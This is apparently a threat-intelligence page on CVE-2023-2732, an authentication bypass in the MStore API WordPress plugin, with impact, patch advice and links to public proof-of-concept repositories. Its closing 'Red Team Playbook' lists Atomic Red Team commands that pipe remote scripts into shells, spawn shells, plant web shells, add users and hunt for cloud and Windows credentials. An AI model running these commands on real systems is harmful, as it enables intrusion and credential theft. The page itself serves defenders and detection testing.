CVE-2023-2732
Overview
This vulnerability is an authentication bypass caused by insufficient validation of the user identity parameter in the add listing REST API endpoint of the MStore API WordPress plugin. The affected component fails to verify that the user ID supplied in the request corresponds to the authenticated user, allowing unauthorized access. This flaw exists in versions up to and including 3.9.2 of the plugin, specifically within the listing REST API controller handling user authentication.
Vulnerability Description
The MStore API plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.2. This is due to insufficient verification on the user being supplied during the add listing REST API request through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id.
Impact
An unauthenticated attacker with network access to the WordPress REST API can exploit this flaw to log in as any user, including administrators, by specifying their user ID in the add listing API request. This allows full account takeover without credentials, enabling unauthorized data access, privilege escalation, and potential site control. The vulnerability requires no user interaction and no privileges (CVSS vector AV:N/AC:L/PR:N/UI:N), making exploitation straightforward and highly impactful in real-world scenarios.
Solution
Upgrade the MStore API WordPress plugin to version 3.9.3 or later, where the authentication bypass vulnerability has been addressed. Refer to the Wordfence advisory at https://www.wordfence.com/threat-intel/vulnerabilities/id/f00761a7-fe24-49a3-b3e3-a471e05815c1 for detailed patch instructions. The patch corrects user ID verification in the add listing REST API handler, eliminating unauthorized user impersonation. No additional workarounds are documented.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The MStore API plugin for WordPress exhibits a critical vulnerability characterized by an authentication bypass flaw. This issue arises from inadequate verification processes concerning the user identity supplied during the add listing REST API request. Specifically, the plugin fails to properly authenticate the user, allowing unauthenticated attackers to impersonate any existing user on the site, including those with elevated privileges such as administrators. The vulnerability exists in versions up to and including 3.9.2, making it imperative for users of the plugin to take immediate action to secure their installations.
Attack vectors for exploiting this vulnerability are alarmingly straightforward. An attacker with knowledge of a valid user ID can craft a malicious request to the add listing endpoint of the MStore API. By bypassing the authentication mechanism, the attacker can gain unauthorized access to the account associated with that user ID. This could lead to a variety of malicious activities, including but not limited to, data exfiltration, unauthorized changes to site content, or even complete control over the WordPress installation if an administrator account is compromised. The simplicity of this attack means that even individuals with limited technical expertise could potentially exploit the vulnerability, increasing the urgency for remediation.
The real-world impact of this vulnerability is significant, particularly for businesses that rely on WordPress for their online presence. A successful exploitation could lead to severe consequences, including data breaches, loss of customer trust, and potential legal ramifications due to non-compliance with data protection regulations. The ability for an attacker to impersonate an administrator can result in the modification or deletion of critical site data, disruption of services, and financial losses. Furthermore, the reputational damage incurred from such incidents can have long-lasting effects on a business's viability and customer relationships.
To detect and mitigate this vulnerability, organizations should first ensure that they are using the latest version of the MStore API plugin, as updates often include critical security patches. Regularly auditing and monitoring API access logs can help identify any unauthorized access attempts or unusual activity that may indicate exploitation of this vulnerability. Additionally, implementing robust authentication mechanisms, such as two-factor authentication (2FA) for all user accounts, can significantly reduce the risk of unauthorized access. Educating users about the importance of strong passwords and the potential risks associated with API endpoints is also crucial in fortifying defenses against exploitation.
In conclusion, the authentication bypass vulnerability in the MStore API plugin for WordPress poses a serious threat to the security of affected installations. The ease of exploitation combined with the potential for severe consequences underscores the necessity for immediate action. By adopting proactive detection and mitigation strategies, organizations can safeguard their systems against this vulnerability and enhance their overall cybersecurity posture. As the landscape of cyber threats continues to evolve, vigilance and timely updates remain essential components of effective risk management.
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting the CVE-2023-2732 vulnerability in the MStore API plugin for WordPress. Our telemetry indicates a sudden increase in detection activity, reflecting a growing interest among threat actors to leverage this authentication bypass flaw. Notably, new proof-of-concept exploits have surfaced on public repositories, broadening the accessibility of attack tools to a wider adversary base, including less sophisticated actors. Although the EPSS score remains stable at a high percentile, the proliferation of publicly available exploits coupled with the surge in observed activity elevates the risk profile of this vulnerability. This development underscores an increased likelihood of opportunistic attacks, particularly against sites with delayed patching or inadequate monitoring. Consequently, defenders should recognize the heightened threat environment as adversaries expand their capabilities to exploit this critical weakness more reliably and at scale.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Inspireui | Mstore Api | All |
cpe:2.3:a:inspireui:mstore_api:*:*:*:*:*:wordpress:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (4)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
RandomRobbieBF/CVE-2023-2732
MStore API <= 3.9.2 - Authentication Bypass
|
RandomRobbieBF | 6 | 7 | 2023-05-25 | View |
|
Ap0dexMe0/CVE-2023-2732
Perform With Massive Authentication Bypass (Wordpress Mstore-API)
|
Ap0dexMe0 | 2 | 4 | 2023-08-05 | View |
|
ThatNotEasy/CVE-2023-2732
Perform With Massive Authentication Bypass (Wordpress Mstore-API)
|
ThatNotEasy | 2 | 4 | 2023-08-05 | View |
|
Jenderal92/WP-CVE-2023-2732
Python 2.7
|
Jenderal92 | 0 | 5 | 2023-06-06 | View |
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-2732 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/f00761a7-fe24-49a3-b3e3-a471e05815c1?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/mstore-api/tags/3.9.0/controllers/listing-rest-api/class.api.fields.php#L1079 |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2916124%40mstore-api&old=2915729%40mstore-api&sfp_email=&sfph_mail=#file58 |